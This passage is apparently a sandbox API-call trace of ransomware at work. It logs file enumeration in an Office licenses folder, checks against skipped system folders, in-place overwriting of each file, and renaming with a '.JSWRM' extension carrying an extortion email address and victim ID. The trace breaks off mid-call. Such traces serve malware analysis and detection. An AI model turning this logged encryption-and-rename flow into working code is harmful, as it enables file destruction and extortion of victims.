[0107.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0107.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0107.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0107.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0107.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0107.615] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8dcbd7a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8dcbd7a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8eb0b81, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a23, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_Retail-ppd.xrm-ms", cAlternateFileName="PRB00A~1.XRM")) returned 1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.615] lstrcmpiW (lpString1="ProfessionalR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0107.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0107.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241038, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0107.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0107.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0107.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241060, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0107.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0107.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.616] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23075) returned 1 [0107.616] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a20) returned 0x24c1d0 [0107.616] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a20, lpOverlapped=0x0) returned 1 [0107.619] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.619] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a20, lpOverlapped=0x0) returned 1 [0107.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.619] CloseHandle (hObject=0x45c) returned 1 [0107.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0107.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0107.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0107.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0107.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.620] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0107.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0107.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0107.625] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8c4e5e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8c4e5e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8d33409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d59, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_Retail-ul-oob.xrm-ms", cAlternateFileName="PR565B~1.XRM")) returned 1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.625] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0107.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0107.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0107.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0107.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0107.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0107.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.648] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11609) returned 1 [0107.648] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0107.648] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0107.650] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.650] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0107.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.650] CloseHandle (hObject=0x45c) returned 1 [0107.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0107.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0107.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0107.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0107.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0107.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0107.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.651] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0107.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0107.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.652] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8b8fa3e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8b8fa3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8c4e5e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4df2, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_Retail-ul-phn.xrm-ms", cAlternateFileName="PRB6B9~1.XRM")) returned 1 [0107.652] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0107.652] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0107.652] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0107.652] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0107.652] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0107.652] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0107.652] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0107.652] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.652] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0107.653] lstrcmpiW (lpString1="ProfessionalR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0107.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0107.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0107.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0107.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0107.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0107.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.654] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19954) returned 1 [0107.654] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0107.654] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0107.656] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.656] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0107.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.657] CloseHandle (hObject=0x45c) returned 1 [0107.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0107.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 